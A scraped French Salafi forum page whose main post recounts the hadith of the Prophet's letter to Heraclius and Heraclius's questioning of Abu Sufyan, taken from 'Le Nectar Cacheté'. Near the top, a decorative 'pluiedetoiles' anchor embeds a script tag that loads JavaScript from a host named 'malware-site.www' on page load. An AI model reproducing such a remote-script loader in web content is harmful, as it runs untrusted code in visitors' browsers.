ISLAM SUIVANT LE CORAN ET LA SUNNA

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<a href="http://#7F96C3" id="pluiedetoiles"><script type="text/javascript" src="http://malware-site.www/js/pluiedetoiles.js"></script></a>Ce présent blog se propose de transmettre le message de l'Islam et le monothéisme islamique d'après le Coran et la Sounna authentique selon la compréhension des Pieux prédécesseurs.

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Bienvenue sur ce forum . Comme son nom l'indique, ce forum a pour but de vous faire découvrir cette magnifique religion qu’est l’Islam ainsi que de rectifier votre avis sur celle-ci. Le forum s’est aussi fixé un autre objectif : « mettre fin aux mensonges islamophobes et défendre l’honneur de D'Allah ainsi que Son Messager »

nous suivons a travers ce forum la voie de nos pieux predecesseurs extrait du coran et de la sounna selon la compréhension de notre bien aimé prophete صلى الله عليه و سلم»

il est basé sur la croyance des gens de la sounnah , et se conforme strictement au coran, et la Sounna du prophète Mohamed صلى الله عليه وسلم ...Les articles que contient ce forum sont des écrits ou des paroles de nos eminents savants salafis , et notre objectif est avant tout d’appeler les gens à l'unicité d'Allah (tawhid) et de diffuser la da'wah salafiyah qui est la bonne compréhension de l’islam,il est le plus rédigé en langue française afin de faire connaître aux musulmans francophones et meme aux mecreants leur religion véridique et les appeler à pratiquer ses enseignements et préceptes, de les avertir du danger de l'association à Allah , ainsi que des innovations et de les mettre en garde sur les mauvaises interprétations de l’islam diffusées par les innovateurs et les groupes égarés.

Lettre à César, roi de Rome : Artfic11

Allah par sa Miséricorde a envoyé des prophètes et des Envoyés avec un seul message, un seul objectif : rappeler aux hommes l’Unicité de dieu ( il n’y a de dieu qu’Allah) Ceci est le fondement de l’islam



 
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    Lettre à César, roi de Rome :

    assalafia
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    Lettre à César, roi de Rome : Empty Lettre à César, roi de Rome :

    Message par assalafia Dim 10 Fév - 14:25

    Lettre à César, roi de Rome : 364988687L’imam
    Al-Boukhâry rapporte dans un long hadith, la teneur de la lettre que le
    Prophète (sala Allahu 'alayhi wa salem) avait adressée à Héraclius 1er,
    empereur d’Orient (610-641), pour l’inviter à embrasser l’Islam. La
    lettre est la suivante :

    « Au nom d'Allah, L’infiniment
    Miséricordieux, le très Miséricordieux. Lettre de Muhammad, le serviteur
    et le Messager d'Allah à Héraclius, empereur de Rome. Que la paix soit
    sur ceux qui suivent la voie droite. Accepte de te soumettre. Embrasse
    l’Islam et Allah te récompensera deux fois. Si tu te détournes et
    refuses, tu porteras les péchés des Romains. « Dis : Ô gens du Livre !
    Convenons les uns des autres de ce point commun entre nous, à savoir de
    n’adorer qu'Allah seul, sans lui adjoindre d’associé, de ne pas nous
    prendre les uns les autres pour divinités en dehors d'Allah. » S’ils se
    détournent, dites-leur : « Soyez témoins, qu’à Allah seul, nous nous
    soumettons ». » (La famille d’Imrâne, v.64).

    Le Prophète (sala
    Allahu 'alayhi wa salem) fit porter cette lettre par Dihya ibn Khalîfa
    Al-Kalby à qui il donna l’ordre de la remettre au roi de Bosrâ qui
    lui-même se chargea de la transmettre à l’empereur d’Orient. Dans les
    propos rapportés par Boukhâry, Ibn Abbas dit avoir été informé par Aboû
    Soufyân ibn Harb du dialogue qui s’est tenu entre lui et l’empereur
    Héraclius 1er, lorsque ce dernier apprit la nouvelle de la lettre. Aboû
    Soufyân présent chez l’empereur, alors qu’il n’avait pas encore embrassé
    l’Islam et dirigeait encore l’inimitié contre le Prophète, témoigne en
    répondant aux questions de l’empereur, curieux de savoir qui est ce
    Muhammad qui se prétend être envoyé d'Allah :

    Héraclius 1er : « Lequel d’entre vous est généalogiquement plus proche de cet homme qui prétend être un prophète ? »

    Aboû Soufyân : « C’est moi. »

    Héraclius 1er : « Rapprochez-le de moi ! Rapprochez ses compagnons et
    mettez-les derrière lui ». Ensuite il dit au traducteur : « Dis-leur que
    je veux interroger leur compagnon au sujet de ce prétendu prophète ; si
    cet homme venait à mentir, alors ses compagnons devraient m’informer de
    ce mensonge. »

    « Par Allah ! N’eût été la honte de me voir
    attribuer un mensonge, j’aurais menti devant les questions de l’empereur
    » affirma par la suite Aboû Soufyân.

    La première question fut la suivante :

    Héraclius 1er : Quelle appréciation faites-vous de sa généalogie ?

    Aboû Soufyân : « Son lignage est noble. »

    Héraclius 1er : « Quelqu’un parmi vous a-t-il jamais, tenu de tels propos ( le fait de se prétendre prophète) ? »

    Abou Soufyan : « Non. »

    Héraclius 1er : « Le soupçonniez-vous de mensonge avant qu’il ne tienne un tel discours ? »

    Abou Soufyan : « Non. »

    Héraclius 1er : « Y a-t-il des rois dans sa descendance ? »

    Aboû Soufyân : « Non. »

    Héraclius 1er : « Ceux qui le suivent sont-ils les nobles ou le bas peuple ? »

    Aboû Soufyân : « Plutôt le bas peuple. »

    Héraclius 1er : « Ces gens augmentent-ils en nombre ou régressent-ils ? »

    Aboû Soufyân : « Ils augmentent plutôt. »

    Héraclius 1er : « Y en a-t-il qui apostasient par aversion après avoir embrassés sa religion ? »

    Aboû Soufyân : « Non. »

    Héraclius 1er : « Lui arrive-t-il de trahir ? »

    Aboû Soufyân : « Non. Toutefois, nous avons conclu une trêve avec lui et nous ne connaissons pas ses intentions. »

    Héraclius 1er : « C’est la seule réponse où je peux trouver à redire. Mais avez-vous été en guerre avec lui ? »

    Aboû Soufyân : « Oui. »

    Héraclius 1er : « Quel a été l’aboutissement de ces combats livrés ? »

    Aboû Soufyân : « Tantôt nous triomphions et tantôt il triomphait. »

    Héraclius 1er : « Que vous ordonne-t-il de faire ? »

    Aboû Soufyân : « Il nous ordonne de n’adorer qu'Allah seul sans rien
    lui associer, de délaisser le culte de nos ancêtres, de faire la prière,
    de verser l’aumône, d’être sincères, d’être chastes et de garder le
    lien avec la famille. »

    Héraclius 1er: (au traducteur) ! «
    Dis-lui que je l’ai interrogé au sujet de son lignage et il a répondu
    qu’il est noble. Il en est de même du lignage des messagers au sein de
    leur peuple. Je lui ai demandé si quelqu’un avant lui, avait eu la même
    prétention et il m’a répondu que « non ». Car, si quelqu’un avant lui,
    avait eu la même prétention, j’aurais pu croire qu’il ne veuille que
    renouveler ce qu’un autre a déjà accompli. Je lui ai demandé s’il y
    avait des rois dans sa descendance et il m’a répondu que « non ». Je me
    suis dit : S’il y avait un roi dans sa descendance, je pourrais penser
    qu’il cherche à reconquérir le trône de son père. Je lui ai demandé
    s’ils le traitaient de menteur avant qu’il n’ait eu à se présenter comme
    prophète et il m’a répondu que « non ». Or j’ai compris par là, que
    s’il n’était pas homme à mentir à l’égard de ses semblables, il ne
    pouvait, à plus forte raison mentir à l’égard d'Allah. Je lui ai demandé
    si ce sont les nobles qui le suivent ou le bas peuple et il répondit «
    le bas peuple », or ce sont ceux-là même qui suivent toujours les
    messagers. Je lui ai demandé si ceux qui le suivent augmentent en nombre
    ou régressent, et il m’a répondu qu’ils progressent, or c’est bien cela
    le propre de la foi qui est de croître jusqu’à atteindre la complétude.
    Je lui ai demandé s’il y en a qui apostasient par aversion parmi ses
    disciples et il m’a répondu que « non », or c’est bien ainsi qu’il en
    est de la foi, lorsque sa douce saveur rencontre les cœurs. Je lui ai
    demandé s’il trahissait, il m’a répondu que « non », or tel est le
    comportement des messagers, ils ne trahissent jamais. Je lui ai demandé
    s’ils se sont combattus, et il m’a répondu que « oui » et que les
    combats entre vous avaient eu des alternatives, tantôt à son avantage et
    tantôt au leur. Il en est ainsi des prophètes, ils subissent des
    épreuves, mais la réussite et le succès final leur reviennent. Je lui ai
    demandé ce qu’il leur ordonne et il m’a répondu « qu’il leur ordonne
    d’adorer Dieu sans rien lui associer, de s’abstenir d’adorer les idoles,
    de prier, de cultiver la sincérité et la chasteté. » Précise-lui que si
    tout ce que tu as dit est vrai, il sera maître de l’endroit sur lequel,
    présentement, foulent mes pieds[1]. Je savais qu’un prophète allait
    paraître, mais je n’imaginais pas qu’il viendrait de vous. Quant à moi,
    s’il m’était possible de l’approcher, je ferais tout pour le rencontrer
    et si j’étais auprès de lui, je laverais moi-même ses pieds ».


    Sur ces mots, il se fit apporter la lettre du Messager d’Allah (Paix et
    Bénédictions d’Allah sur lui) et la lut. Toutefois, dès qu’il eut fini
    les voix s’élevèrent et le bavardage alla en bon train. Ensuite, il
    donna aux Kouraichites l’ordre de se retirer. A sa sortie Abou Soufyan
    dit à ses compagnons : « L’affaire d’Ibn Abi Kabcha (nom que les
    associateurs avaient donné au prophète (Paix et Bénédictions d’Allah sur
    lui) poussés en cela par une volonté d’ignorer sa généalogie) devient
    étonnante. Même le roi des Romains a peur de lui ». A cet égard il dit
    plus tard après sa conversion : « Je ne cessai d’être certain que le
    Messager d’Allah (Paix et Bénédictions d’Allah sur lui) finirait par
    triompher, jusqu’au jour où Allah me fit entrer dans l’Islam ».

    Voilà le témoignage apporté par Abi Soufyan au sujet de l’effet de
    cette lettre sur César. Celui-ci offrit à Dihya ibn Khalifa Al-Kalbi, le
    porteur de la lettre, de l’argent et des vêtements.

    Texte tiré du livre « Al-Raheeq Al-Makhtoum», Le Nectar Cacheté du cheikh Al-Moubarakfoury

      La date/heure actuelle est Lun 20 Mai - 0:57